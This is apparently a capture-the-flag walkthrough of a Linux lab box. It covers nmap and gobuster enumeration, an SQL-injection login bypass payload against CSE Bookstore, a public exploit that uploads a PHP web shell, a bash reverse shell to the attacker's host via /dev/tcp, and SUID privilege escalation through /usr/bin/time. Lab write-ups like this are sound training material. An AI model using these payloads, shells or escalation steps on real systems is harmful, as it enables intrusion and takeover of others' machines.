Table of Contents
- Target OS: Linux
- Rated Difficulty: Easy
ENUM >> NMAP
# Nmap 7.92 scan initiated Tue Feb 15 15:16:09 2022 as: nmap -sS -v -sV -sC -oN nmap_initial 192.168.178.111
Nmap scan report for 192.168.178.111
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_gym
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 15 15:16:30 2022 -- 1 IP address (1 host up) scanned in 21.64 secondsENUM >> GoBuster scan
❯ gobuster dir -u http://192.168.178.111 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -x php,html,htm,js
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.178.111
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,htm,js
[+] Timeout: 10s
===============================================================
2022/02/15 15:17:22 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 318] [--> http://192.168.178.111/admin/]
/dashboard.php (Status: 302) [Size: 10272] [--> http://192.168.178.111/index.php]
/forgot-password.php (Status: 200) [Size: 2763]
/header.php (Status: 200) [Size: 1666]
/index.html (Status: 200) [Size: 10918]
/index.php (Status: 200) [Size: 3468]
/logout.php (Status: 200) [Size: 75]
/profile.php (Status: 302) [Size: 7247] [--> http://192.168.178.111/index.php]
/registration.php (Status: 200) [Size: 9409]
/robots.txt (Status: 200) [Size: 14]
/secret (Status: 301) [Size: 319] [--> http://192.168.178.111/secret/]
/store (Status: 301) [Size: 318] [--> http://192.168.178.111/store/]
===============================================================
2022/02/15 15:23:16 Finished
===============================================================PRIVESC >> /store is CSE Bookstore
OK, I’ve done this dance before… Infact, it was part of the OWASP Top 10 room on TryHackMe… so without further ado (and notes from when I did that room on THM):
- Immediately we are greeted with the name of this web application on the very first page (hence why I knew it would be our PrivEsc method as soon as I loaded this page):
- Doing a search on
searchsploitbrings us the 3 below hits… I do like the sound of "Authentication Bypass"!
❯ searchsploit "CSE Bookstore"
---------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------- ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass | php/webapps/48960.txt
CSE Bookstore 1.0 - Multiple SQL Injection | php/webapps/49314.txt
---------------------------------------------------------------------------------------------------- --------------------------------- The text file was simple yet straight to the point…:
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909
CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel.
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.
Payload:
Name: admin
Pass: %' or '1'='1- I went with option 1 for password, since it was literally 2 characters…:
- And just like that, we got
adminon the website! But, what next? Not much actually… but all is not lost:
- Turns out, if we search for
Online Book Storeon exploit-db we get another exploit that might be worth a shot (and this is where I jumped straight to on this box, as I knew the previous steps were not required):
- Downloading and running the exploit… we get a
RCE $prompt. Not being a fan of flimsy web shells, I quickly opted for a "bash reverse shell" upgrade:
❯ python3 47887.py http://192.168.178.111/store/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://192.168.178.111/store/bootstrap/img/13fLOMSeJW.php
> Example command usage: http://192.168.178.111/store/bootstrap/img/13fLOMSeJW.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ bash -c 'bash -i &>/dev/tcp/192.168.49.178/1337 <&1'- That’s better! 🙂
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.49.178] from (UNKNOWN) [192.168.178.111] 56036
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
www-data@funbox3:/var/www/html/store/bootstrap/img$PRIVESC >> time is SUID
OK this box was as advertised… a quick look at the SUID binaries and we notice that /usr/bin/time has that special-sauce flag. The time app simply returns the time it took for a command to run when it either crashes or completes, so basically it’s a easy step into running whatever we wish as root… in this case /bin/sh -p will give us that # prompt that makes you feel all good inside. 😉
www-data@funbox3:/var/www/html/store/bootstrap/img$ /usr/bin/time /bin/sh -p
#